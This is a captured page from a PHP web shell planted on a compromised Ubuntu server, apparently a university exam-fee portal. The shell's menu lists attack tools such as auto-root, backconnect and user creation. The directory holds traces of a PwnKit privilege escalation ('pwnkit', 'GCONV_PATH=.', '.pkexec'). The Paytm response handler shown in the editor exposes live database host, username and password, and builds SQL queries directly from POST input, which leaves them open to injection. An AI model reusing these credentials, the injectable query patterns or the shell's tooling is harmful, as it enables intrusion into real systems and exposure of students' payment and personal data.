Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.235.195
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
Paytm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxrwxrwx
.Paytm.php
3.61
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
CHECK_TxnStatuss.php
1.53
KB
-rwxrwxrwx
TxnStatus.php
2.11
KB
-rwxrwxrwx
TxnTest.php
1.75
KB
-rwxrwxrwx
pgRedirect.php
7.91
KB
-rwxrwxrwx
pgRedirect_29112019.php
3.85
KB
-rwxrwxrwx
pgResponse.php
10.48
KB
-rwxrwxrwx
pgResponse_new.php
3.73
KB
-rwxrwxrwx
pgResponse_old.php
2.09
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgResponse.php
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous"> <?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included //require_once("./pgRedirect.php"); require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $databse = 'logisys3_comexam'; $conn = new mysqli($servername,$username,$password,$databse); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $paytmChecksum = ""; $paramList = array(); $isValidChecksum = "FALSE"; $paramList = $_POST; $univcode = str_pad(substr($paramList['MERC_UNQ_REF'],1,2),3,"0",STR_PAD_LEFT); $typeno = substr($paramList['MERC_UNQ_REF'],0,1); if($typeno == '1') $type = 'exam'; if($typeno == '2') $type = 'res'; $get_data = "select * from maspg where fbank = 'Paytm' and FENTTYPE = '{$type}' and funivcode = '{$univcode}'"; $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { while($row = mysqli_fetch_assoc($result)) { $key = $row['fkey']; $mid = $row['fmid']; $fworkingid = $row['fworkingid']; $fmode = $row['fmode']; $freturnurl = $row['freturnurl']; } } $paytmChecksum = isset($_POST["CHECKSUMHASH"]) ? $_POST["CHECKSUMHASH"] : ""; //Sent by Paytm pg //Verify all parameters received from Paytm pg to your application. Like MID received from paytm pg is same as your application�s MID, TXN_AMOUNT and ORDER_ID are same as what was sent by you to Paytm PG for initiating transaction etc. $isValidChecksum = verifychecksum_e($paramList, $key, $paytmChecksum); //will return TRUE or FALSE string. if($isValidChecksum == "TRUE") { $status = $_POST["STATUS"]; //echo $status; //print_r($_POST); $orderid = $_POST["ORDERID"]; $productinfo = $_POST["MERC_UNQ_REF"]; $txnid = $_POST["TXNID"]; $MID = $_POST["MID"]; $CHECKSUMHASH = $_POST["CHECKSUMHASH"]; //echo $productinfo; //$productinfo = '103E3050155'; $MID = $mid; $requestParamList = array(); $responseParamList = array(); $requestParamList = array("MID" => "{$MID}" , "ORDERID" => "{$orderid}", "MERC_UNQ_REF" => "{$productinfo}"); $checkSum = getChecksumFromArray($requestParamList,$key); $requestParamList['CHECKSUMHASH'] = urlencode($checkSum); $data_string = "JsonData=".json_encode($requestParamList); $ch = curl_init(); // initiate curl //$url = "https://securegw-stage.paytm.in/merchant-status/getTxnStatus"; // where you want to post data //$url = "https://securegw.paytm.in/merchant-status/getTxnStatus"; $url = "https://securegw.paytm.in/merchant-status/getTxnStatus"; curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, true); // tell curl you want to post something curl_setopt($ch, CURLOPT_POSTFIELDS,$data_string); // define what you want to post curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the output in string format $headers = array(); $headers[] = 'Content-Type: application/json'; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $output = curl_exec($ch); // execute $info = curl_getinfo($ch); $data = json_decode($output, true); //echo $data; if ($data["STATUS"] == "TXN_SUCCESS") { $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; /* $servername = "localhost"; $username = "root"; $password = "";*/ $dbname = "logisys3_comexam"; $conn = new mysqli($servername, $username, $password, $dbname); $get_data = "select * from dbname where funivcode ='{$univcode}'"; $result1=$conn->query($get_data); if (mysqli_num_rows($result1) > 0) { $dbnames = array(); $uniname = ""; $ffolder = ""; while($row = mysqli_fetch_assoc($result1)) { $dbnames[$row['FUNIVCODE']] = $row['FDBNAME']; $uniname = $row['FUNIVNAME']; $ffolder = $row['FFOLDER']; } } $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $dbname = $dbnames[$univcode]; //$dbname = "logisys3_bcu"; /*$servername = "localhost"; $username = "root"; $password = ""; $dbname = "logisys3_dud";*/ $conn = new mysqli($servername, $username, $password, $dbname); $status = $data["STATUS"]; $ORDERID = $data["ORDERID"]; $productinfo = $data["MERC_UNQ_REF"]; $txnid = $data["TXNID"]; $MID = $data["MID"]; //$CHECKSUMHASH = $data["CHECKSUMHASH"]; $txnid = $data['TXNID']; $firstname = 'Paytm'; echo "<center><h1 >".$uniname."</h1></center>"; echo "<div style = 'width:50%; margin:10% auto'> <h4 style='color:green;'>Thank You. Your order status is success</h4>"; echo "<h4>Your Transaction ID for this transaction is : ".$data['TXNID'].".</h4>"; echo "<h4>We have received a payment of Rs. : " . $data['TXNAMOUNT'] ."</h4>"; $html="<button type='button' class='btn btn-primary w-10' onclick=\"PrintApplicationFormNETBANKING('{$productinfo}','{$ffolder}','{$type}');\" >Click here to take a PrintOut</button></div>"; echo $html; if($type == 'exam') { $update="update appcandsum set FPAYMENTREMARKS='{$data['TXNID']}',FPAYMENTSTATUS='success', FPAYMENTCONFIRM='success',FACKDATE=now(),FACKUSER='{$firstname}', FPAYGATEWAY = '{$firstname}' where APPNO='{$productinfo}'"; $result=$conn->query($update); /*$get_app_cand_det="SELECT FDEGREE,FEXAMNO,FCOLLCODE,FREGNO,FSUBCODE,FINSERTED,FPRESENT,FYEAR,FEXAMTYPE FROM appcanddet WHERE APPNO='{$productinfo}'"; $result = $conn->query($get_app_cand_det);*/ $get_app_cand_det="SELECT a.FDEGREE,a.FEXAMNO,a.FCOLLCODE, a.FREGNO,a.FSUBCODE,a.FINSERTED,a.FPRESENT,a.FYEAR,a.FEXAMTYPE,concat('Message from Bengaluru Central University : ', ' Dear ',s.fname,' (Reg. no. : ',s.fregno,' , Stud. id. : ',s.fstudid,'),', ' Rs.',FLOOR(c.FTOTALFEE),'/- is received at university. Your application no. is ',c.appno, '. keep this information for future reference.',' Sent Time: ',time(now())) as message FROM appcanddet a inner join student s on a.fdegree = s.fdegree and s.fcollcode = a.fcollcode and a.fregno = s.fregno inner join appcandsum c on a.fdegree = c.fdegree and a.fcollcode = c.fcollcode and a.fregno = c.fregno and a.appno = c.appno WHERE c.APPNO='{$productinfo}'"; $result = $conn->query($get_app_cand_det); if (mysqli_num_rows($result) > 0) { while($row = mysqli_fetch_assoc($result)) { $collcode = $row['FCOLLCODE']; $degree = $row['FDEGREE']; $regno = $row['FREGNO']; $text = $row['message']; } } $update_cand_sum = "UPDATE appcandsum a,candsum c SET c.FEXAMFEEA=if(ifnull(c.FEXAMFEEA,0) <=0,ifnull(a.FEXAMFEEA,0),ifnull(c.FEXAMFEEA,0)), c.FEXAMFEEB=if(ifnull(c.FEXAMFEEB,0) <=0,ifnull(a.FEXAMFEEB,0),ifnull(c.FEXAMFEEB,0)), c.FEXAMFEEC=if(ifnull(c.FEXAMFEEC,0) <=0,ifnull(a.FEXAMFEEC,0),ifnull(c.FEXAMFEEC,0)), c.FEXAMFEED=if(ifnull(c.FEXAMFEED,0) <=0,ifnull(a.FEXAMFEED,0),ifnull(c.FEXAMFEED,0)), c.FEXAMFEEE=if(ifnull(c.FEXAMFEEE,0) <=0,ifnull(a.FEXAMFEEE,0),ifnull(c.FEXAMFEEE,0)), c.FEXAMFEEF=if(ifnull(c.FEXAMFEEF,0) <=0,ifnull(a.FEXAMFEEF,0),ifnull(c.FEXAMFEEF,0)), c.FEXAMFEEG=if(ifnull(c.FEXAMFEEG,0) <=0,ifnull(a.FEXAMFEEG,0),ifnull(c.FEXAMFEEG,0)), c.FEXAMFEEH=if(ifnull(c.FEXAMFEEH,0) <=0,ifnull(a.FEXAMFEEH,0),ifnull(c.FEXAMFEEH,0)), c.FEXAMFEEI=if(ifnull(c.FEXAMFEEI,0) <=0,ifnull(a.FEXAMFEEI,0),ifnull(c.FEXAMFEEI,0)), c.FEXAMFEEJ=if(ifnull(c.FEXAMFEEJ,0) <=0,ifnull(a.FEXAMFEEJ,0),ifnull(c.FEXAMFEEJ,0)), c.FTOTALFEE=a.FTOTALFEE, c.frecptdate = date(now()) WHERE a.fregno=c.FREGNO AND a.APPNO='{$productinfo}' and a.FCOLLCODE='{$collcode}'"; $result = $conn->query($update_cand_sum); $update_cand_appCand = "update canddet c, appcanddet t set c.finserted = t.finserted, c.fpresent = t.fpresent where c.fdegree = t.fdegree and c.fexamno = t.fexamno and c.fregno = t.fregno and c.fsubcode = t.fsubcode and c.fdegree = '{$degree}' and c.fregno = '{$regno}' and t.APPNO='{$productinfo}' and ifnull(c.fpresent,'') <> 'P'"; $result = $conn->query($update_cand_appCand); $insert_canddet ="insert into canddet(fdegree,FEXAMNO, FCOLLCODE, FREGNO, FSUBCODE, FINSERTED, FPRESENT, FYEAR, FEXAMTYPE) select fdegree, FEXAMNO, FCOLLCODE,FREGNO, FSUBCODE,FINSERTED, FPRESENT, FYEAR,FEXAMTYPE from appcanddet where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,fsubcode) not in(select CONCAT(fdegree,fexamno,fregno,fsubcode) from canddet where fregno = '{$regno}') "; $result = $conn->query($insert_canddet); $update_studfee = "update studfee s, appstudfee a set s.famount = a.famount, s.flogdate = a.flogdate where s.fdegree = a.fdegree and s.fexamno = a.fexamno and s.fregno = a.fregno and s.ffeecode = a.ffeecode and s.fregno = '{$regno}' and a.appno ='{$productinfo}'"; $result = $conn->query($update_studfee); $insert_studfee = "insert into studfee(fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate) select fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate from appstudfee where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,ffeecode) not in(select CONCAT(fdegree,fexamno,fregno,ffeecode) from studfee where fdegree = '{$degree}' and fregno = '{$regno}')"; $result = $conn->query($insert_studfee); } } else { echo "<b>Transaction status is failure</b>" . "<br/>"; } // if (isset($_POST) && count($_POST)>0 ) // { // foreach($_POST as $paramName => $paramValue) { // echo "<br/>" . $paramName . " = " . $paramValue; // } // } } else { echo "<b>Checksum mismatched.</b>"; //Process transaction as suspicious. } ?> <script> function PrintApplicationFormNETBANKING(appno,folder,type) { if(location.protocol != 'https:') { $host_url="http://studentportal.universitysolutions.in/"+folder+"/app.php?&a="; } else { $host_url="https://studentportal.universitysolutions.in/"+folder+"/app.php?&a="; } switch(type) { case 'exam': window.location.href=$host_url+"PrintApplicationFormNETBANKING&app_no="+appno; break; case 'res': alert('res'); break; } } </script>
Close